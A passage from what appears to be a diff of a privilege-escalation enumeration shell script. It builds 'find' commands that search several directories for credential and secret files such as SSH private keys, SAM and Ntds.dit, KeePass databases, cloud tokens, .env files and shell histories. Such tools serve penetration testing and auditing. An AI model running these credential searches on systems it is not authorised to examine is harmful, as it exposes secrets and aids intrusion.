\"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name 
\"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name 
\"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name 
\"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \"ssh*config\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_LIB=`eval_bckgrd "find /lib -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. 
'\\\$NC 1>&2;"` FIND_LIB32=`eval_bckgrd "find /lib32 -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_LIB64=`eval_bckgrd "find /lib64 -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_MEDIA=`eval_bckgrd "find /media -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name 
\"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name 
\"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. 
'\\\$NC 1>&2;"` - FIND_MNT=`eval_bckgrd "find /mnt -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o 
-name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"sess_*\" -o -name \"000-default.conf\" -o -name \"ffftp.ini\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" 
-o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_OPT=`eval_bckgrd "find /opt -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o 
-name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name 
\"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. 
'\\\$NC 1>&2;"` - FIND_PRIVATE=`eval_bckgrd "find /private -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name 
\"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"agent*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"sess_*\" -o -name \"000-default.conf\" -o -name \"ffftp.ini\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name 
\".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_MEDIA=`eval_bckgrd 